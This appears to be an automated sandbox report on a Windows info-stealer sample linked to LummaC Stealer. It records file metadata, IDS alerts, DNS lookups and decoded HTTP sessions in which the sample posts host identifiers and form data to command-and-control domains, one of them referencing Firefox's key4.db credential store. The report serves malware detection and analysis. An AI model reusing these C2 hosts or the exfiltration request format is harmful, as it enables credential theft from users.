                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgFvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.c.lencr.org/0FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://begindecafer.world/QwdZdfUFvbuInU.exe, 00000000.00000002.1968730807.00000000015BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://begindecafer.world:443/QwdZdflt-release/key4.dbPKFvbuInU.exe, 00000000.00000002.1968562073.0000000001553000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001553000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://support.mozilla.org/products/firefoxgro.allFvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.mozilla.orFvbuInU.exe, 00000000.00000003.1470330878.0000000005CB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://gemini.google.com/app?q=FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://begindecafer.world/FvbuInU.exe, 00000000.00000003.1967004894.0000000001580000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaFvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.53.52 | nebdulaq.digital | United States | 13335 | CLOUDFLARENETUS | true
188.114.96.3 | begindecafer.world | European Union | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1632098
Start date and time: 2025-03-07 19:36:21 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: FvbuInU.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 23.199.214.10, 2.16.185.191
• Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
13:37:31 | API Interceptor | 181581x Sleep call for process: FvbuInU.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
begindecafer.world | JqGBbm7.exe | malicious | LummaC Stealer | 188.114.97.3
begindecafer.world | Br6Dejo3eu.exe | malicious | LummaC Stealer | 188.114.96.3
                                                                    No context
                                                                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.90839452579607
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: FvbuInU.exe
File size: 2'090'496 bytes
MD5: a4069f02cdd899c78f3a4ee62ea9a89a
SHA1: c1e22136f95aab613e35a29b8df3cfb933e4bda2
SHA256: 3342c1acf9c247d7737a732ed3e1b3cf64be072b4094f41d50fc1c0ee944d6f4
SHA512: 10b10c2d97f1616b6b73626b3813ffbca4c3ade9154dd48755611d02713ad15ee97597b84a8d3b962b0c143e0de60b468fd2cba992921f43469a5055fea21c39
SSDEEP: 49152:IBQUe7pMmNFPWiRcCCuyL/7ll4//7JKkcq9qNWv1ouR6xk0uNZ:I1WMmjPWrCCuajrrkDPYQ
TLSH: 0FA52215AC352B6BD25C1936518486CAA6C0E114A36EACEFDCF1E17C76EBEC09DB0F50
                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g............................. J...........@..........................PJ....... ...@.................................W...k..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x8a2000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67C9DDEB [Thu Mar 6 17:39:55 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                                                                    Instruction
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    inc ebp
                                                                    add al, byte ptr [eax]
                                                                    add byte ptr [edx], cl
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [ecx], al
                                                                    add byte ptr [eax], 00000000h
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add dword ptr [eax+00000000h], 00000000h
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x1f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x611f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x5f000 | 0x5f000 | 78a548b09a80c386b74dd33fd5f9cd74 | False | 0.5991108141447369 | data | 7.20142058220356 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x60000 | 0x1f0 | 0x200 | ed9cb562edd5fa872c182ae8556f7a61 | False | 0.626953125 | data | 4.883492107886929 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x61000 | 0x1000 | 0x200 | f47b289bcee0e13a937cc29db13607bf | False | 0.150390625 | data | 1.0437720338377494 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x62000 | 0x2a3000 | 0x200 | 4f08c17ceb43279291ddea24ab2db9da | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kzbupdkl | 0x305000 | 0x19c000 | 0x19b800 | 94d936f8b671a76044b9721bb304311f | False | 0.9941578305361483 | OpenPGP Public Key | 7.952571902495584 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bmqfvobi | 0x4a1000 | 0x1000 | 0x600 | 283d77e5b8b6b06ce83bef7f2ac23378 | False | 0.5559895833333334 | data | 4.921593981596737 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a2000 | 0x3000 | 0x2200 | 86b5b631710149ef10c99fb6a9ae5cb5 | False | 0.06985294117647059 | DOS executable (COM) | 0.7995920042135382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x4a0494 | 0x198 | ASCII text, with CRLF line terminators | | | 0.5833333333333334
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-07T19:37:30.899123+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49687 | 104.21.53.52 | 443 | TCP
2025-03-07T19:37:36.436560+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49688 | 104.21.53.52 | 443 | TCP
2025-03-07T19:37:41.094080+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49689 | 104.21.53.52 | 443 | TCP
2025-03-07T19:37:46.246258+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49690 | 104.21.53.52 | 443 | TCP
2025-03-07T19:37:52.577430+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49691 | 104.21.53.52 | 443 | TCP
2025-03-07T19:38:15.919366+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49694 | 104.21.53.52 | 443 | TCP
2025-03-07T19:38:23.280842+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49695 | 104.21.53.52 | 443 | TCP
2025-03-07T19:38:31.004250+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49696 | 188.114.96.3 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                    Mar 7, 2025 19:38:21.549484968 CET49695443192.168.2.6104.21.53.52
                                                                    Mar 7, 2025 19:38:21.549518108 CET44349695104.21.53.52192.168.2.6
                                                                    Mar 7, 2025 19:38:21.549598932 CET49695443192.168.2.6104.21.53.52
                                                                    Mar 7, 2025 19:38:21.549920082 CET49695443192.168.2.6104.21.53.52
                                                                    Mar 7, 2025 19:38:21.549928904 CET44349695104.21.53.52192.168.2.6
                                                                    Mar 7, 2025 19:38:23.280617952 CET44349695104.21.53.52192.168.2.6
                                                                    Mar 7, 2025 19:38:23.280842066 CET49695443192.168.2.6104.21.53.52
                                                                    Mar 7, 2025 19:38:23.282191992 CET49695443192.168.2.6104.21.53.52
                                                                    Mar 7, 2025 19:38:23.282203913 CET44349695104.21.53.52192.168.2.6
                                                                    Mar 7, 2025 19:38:23.282478094 CET44349695104.21.53.52192.168.2.6
                                                                    Mar 7, 2025 19:38:23.283749104 CET49695443192.168.2.6104.21.53.52
                                                                    Mar 7, 2025 19:38:23.283777952 CET49695443192.168.2.6104.21.53.52
                                                                    Mar 7, 2025 19:38:23.283826113 CET44349695104.21.53.52192.168.2.6
                                                                    Mar 7, 2025 19:38:28.181068897 CET49695443192.168.2.6104.21.53.52
                                                                    Mar 7, 2025 19:38:28.209577084 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:28.209626913 CET44349696188.114.96.3192.168.2.6
                                                                    Mar 7, 2025 19:38:28.209705114 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:28.210282087 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:28.210292101 CET44349696188.114.96.3192.168.2.6
                                                                    Mar 7, 2025 19:38:31.004162073 CET44349696188.114.96.3192.168.2.6
                                                                    Mar 7, 2025 19:38:31.004250050 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:31.006247044 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:31.006257057 CET44349696188.114.96.3192.168.2.6
                                                                    Mar 7, 2025 19:38:31.006525040 CET44349696188.114.96.3192.168.2.6
                                                                    Mar 7, 2025 19:38:31.008213043 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:31.008229971 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:31.008343935 CET44349696188.114.96.3192.168.2.6
                                                                    Mar 7, 2025 19:38:32.859915018 CET44349696188.114.96.3192.168.2.6
                                                                    Mar 7, 2025 19:38:32.860008955 CET44349696188.114.96.3192.168.2.6
                                                                    Mar 7, 2025 19:38:32.860060930 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:32.860385895 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:32.860405922 CET44349696188.114.96.3192.168.2.6
                                                                    Mar 7, 2025 19:38:32.860440969 CET49696443192.168.2.6188.114.96.3
                                                                    Mar 7, 2025 19:38:32.860447884 CET44349696188.114.96.3192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 7, 2025 19:37:28.220690012 CET | 52871 | 53 | 192.168.2.6 | 1.1.1.1
Mar 7, 2025 19:37:28.234425068 CET | 53 | 52871 | 1.1.1.1 | 192.168.2.6
Mar 7, 2025 19:38:28.188555956 CET | 52430 | 53 | 192.168.2.6 | 1.1.1.1
Mar 7, 2025 19:38:28.198329926 CET | 53 | 52430 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 7, 2025 19:37:28.220690012 CET | 192.168.2.6 | 1.1.1.1 | 0xba95 | Standard query (0) | nebdulaq.digital | A (IP address) | IN (0x0001) | false
Mar 7, 2025 19:38:28.188555956 CET | 192.168.2.6 | 1.1.1.1 | 0xb623 | Standard query (0) | begindecafer.world | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 7, 2025 19:37:28.234425068 CET | 1.1.1.1 | 192.168.2.6 | 0xba95 | No error (0) | nebdulaq.digital |  | 104.21.53.52 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 19:37:28.234425068 CET | 1.1.1.1 | 192.168.2.6 | 0xba95 | No error (0) | nebdulaq.digital |  | 172.67.209.33 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 19:38:28.198329926 CET | 1.1.1.1 | 192.168.2.6 | 0xb623 | No error (0) | begindecafer.world |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Mar 7, 2025 19:38:28.198329926 CET | 1.1.1.1 | 192.168.2.6 | 0xb623 | No error (0) | begindecafer.world |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                                    • nebdulaq.digital
                                                                    • begindecafer.world
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49687 | 104.21.53.52 | 443 | 7544 | C:\Users\user\Desktop\FvbuInU.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 18:37:30 UTC | 266 | OUT | POST /aQwdw HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 47
                                                                    Host: nebdulaq.digital
2025-03-07 18:37:30 UTC | 47 | OUT | Data Raw: 75 69 64 3d 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 26 63 69 64 3d
                                                                    Data Ascii: uid=9c3be6f4c5e0a94b189ca0d8299f35fd794488&cid=
2025-03-07 18:37:32 UTC | 775 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 07 Mar 2025 18:37:31 GMT
                                                                    Content-Type: application/octet-stream
                                                                    Content-Length: 14134
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kdvsuq7qqsHsUIOK0UILPripbe6uqs3h6bzPCFMh9JJPpBTfRVunwf2I4llQJpCLQFb4mRCkgypufVfk47awOHi3xQzELqdPf5OdAB7G9rZWdO1BcJErhjHW6BST%2B9Qqnt81"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 91cc345ef971fa23-ORD
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=565&min_rtt=543&rtt_var=166&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=949&delivery_rate=7073345&cwnd=252&unsent_bytes=0&cid=11dfee99772da5ae&ts=1098&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49688 | 104.21.53.52 | 443 | 7544 | C:\Users\user\Desktop\FvbuInU.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 18:37:36 UTC | 276 | OUT | POST /aQwdw HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=RX3IfGZa8M
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 14875
                                                                    Host: nebdulaq.digital
2025-03-07 18:37:36 UTC | 14875 | OUT | Data Raw: 2d 2d 52 58 33 49 66 47 5a 61 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 52 58 33 49 66 47 5a 61 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 58 33 49 66 47 5a 61 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33
                                                                    Data Ascii: --RX3IfGZa8MContent-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--RX3IfGZa8MContent-Disposition: form-data; name="pid"2--RX3IfGZa8MContent-Disposition: form-data; name="hwid"D69207D5222EDA67E3EDCEA778368E3
2025-03-07 18:37:38 UTC | 817 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 07 Mar 2025 18:37:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ihAiEDzw2xob%2BHaY7FRne11nbQSZiMd7zrvCZds0rGxXS7pJT%2FriW3rONKaAhH8Zb3tjUvEIAXVt%2FBQjNhSZ8qIHQBlVESBcMpfrg7jTYYxfC3EEjt4io8lt2xyIUM%2B%2FlAri"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 91cc3481a86998b9-ORD
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1373&min_rtt=1373&rtt_var=515&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15809&delivery_rate=2879825&cwnd=252&unsent_bytes=0&cid=81d5f1041cb2fb00&ts=1767&x=0"
2025-03-07 18:37:38 UTC | 76 | IN | Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 33 38 2e 31 39 39 2e 34 32 2e 31 36 34 22 7d 7d 0d 0a
Data Ascii: 46{"success":{"message":"message success delivery from 138.199.42.164"}}
2025-03-07 18:37:38 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49689 | 104.21.53.52 | 443 | 7544 | C:\Users\user\Desktop\FvbuInU.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 18:37:41 UTC | 276 | OUT | POST /aQwdw HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=vfAsqCzce7
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 15056
                                                                    Host: nebdulaq.digital
2025-03-07 18:37:41 UTC | 15056 | OUT | Data Raw: 2d 2d 76 66 41 73 71 43 7a 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 76 66 41 73 71 43 7a 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 76 66 41 73 71 43 7a 63 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33
                                                                    Data Ascii: --vfAsqCzce7Content-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--vfAsqCzce7Content-Disposition: form-data; name="pid"2--vfAsqCzce7Content-Disposition: form-data; name="hwid"D69207D5222EDA67E3EDCEA778368E3
2025-03-07 18:37:42 UTC | 811 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 07 Mar 2025 18:37:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xshGdnXpSwtbUqjlTY%2BzWocwyohuDVRBFO6avEefeRn0wlCdHH5XiAruLrs6xiTr8Fc%2BBBgBdSEt2VATbXlfcFwlgwDmCbRpHYu6TAIX0XhfNZ7ahaxue3uCnnjxPqpDUHES"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 91cc349e9fdf1aeb-ORD
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1166&min_rtt=1141&rtt_var=446&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15990&delivery_rate=3465381&cwnd=252&unsent_bytes=0&cid=ddb9ee57058e8d0a&ts=1671&x=0"
2025-03-07 18:37:42 UTC | 76 | IN | Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 33 38 2e 31 39 39 2e 34 32 2e 31 36 34 22 7d 7d 0d 0a
Data Ascii: 46{"success":{"message":"message success delivery from 138.199.42.164"}}
2025-03-07 18:37:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49690 | 104.21.53.52 | 443 | 7544 | C:\Users\user\Desktop\FvbuInU.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-07 18:37:46 UTC | 283 | OUT | POST /aQwdw HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=QQBZoM6TdV2vZ1kvP
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 19948
                                                                    Host: nebdulaq.digital
